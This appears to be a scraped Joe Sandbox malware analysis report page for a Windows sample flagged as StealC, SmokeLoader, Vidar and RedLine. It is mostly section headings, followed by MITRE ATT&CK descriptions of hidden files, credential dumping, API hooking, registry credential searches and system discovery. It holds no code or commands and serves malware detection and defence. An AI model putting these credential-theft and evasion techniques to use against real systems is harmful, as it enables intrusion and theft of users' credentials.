Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report i1crvbOZAP.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: SmokeLoader

Threatname: Vidar

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Change of critical system settings

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Change of critical system settings

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AEBKKECBGIIJJKECGIJECGDHIE

Windows Analysis Report
i1crvbOZAP.exe

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre